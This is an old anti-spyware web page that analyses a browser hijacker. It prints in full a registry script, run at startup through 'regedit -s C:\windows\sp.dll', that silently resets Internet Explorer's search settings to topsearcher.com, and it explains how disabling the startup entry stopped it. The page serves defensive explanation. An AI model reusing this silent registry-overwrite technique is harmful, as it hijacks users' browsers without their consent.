Return to
Return to SpywareInfo Home


A fellow by the name of Peter had a problem recently. His default search page for Internet Explorer had been hijacked. His default search page was being switched from his preferred settings to where it would point to a search engine site, http://www.topsearcher.com/ie/. He would change the setting back, but it would get reset every time he rebooted. He finally turned to the GRC newsgroups for help with this exasperating problem. When he posted a reply about an entry that he found in MSCONFIG, I strongly suspected that I was looking at the culprit:

If I look at msconfig, under startup, there is an entry that reads as follows.

sp regedit -s C:\windows\sp.dll
has this anything to do with it?
Peter

That is a command line function that tells regedit to make alterations to the Windows registry without prompting the user. I asked him to email to me the file (sp.dll) that was mentioned, which he did. Take a look at the contents of this file:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.topsearcher.com/ie/"
"Search Page"="http://www.topsearcher.com/ie/"
"Search Bar"="http://www.topsearcher.com/ie/"
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.topsearcher.com/ie/"
"Default_Search_URL"="http://www.topsearcher.com/ie/"
"Search Bar"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window_Placement"=hex:2c,00,00,00,02,00,00,00,03,00,00,00,b8,0b,00,00,b8,0b,00,00,fc,ff,ff,ff,fc,ff,ff,ff,51,00,
00,00,51,00,00,00,a9,02,00,00,e5,01,00,00

[HKEY_CURRENT_USER\Software\Micrsoft\Internet Explorer\Toolbar\WebBrowser]
"ITBarLayout"=hex:11,00,00,00,4c,00,00,00,00,00,00,00,10,00,00,00,1f,00,00,00,7c,00,00,00,01,00,00,00,a0,02,00,
00,2b,01,00,00,05,00,00,00,62,00,00,00,26,00,00,00,02,00,00,00,a1,02,00,00,c8,00,00,00,04,00,00,00,a1,00,00,00,
c7,01,00,00,03,00,00,00,a1,02,00,00,cf,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,24,d0,30,81,6a,d0,11,82,74,00,c0,4f,d5,ae,38,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00

That is nothing more than an instruction placed into the registry to run regedit with that command parameter. It loads into the registry all of those values above, overwriting the settings that Peter had reset over and over. He reports that since unchecking that entry in MSCONFIG, the hijacking has ceased. :)




Previous page

Have a suggestion?
Notice an error or a dead link?
Then click here to email me.


For those with javascript disabled browsers, copy the address below:




Site Privacy Policy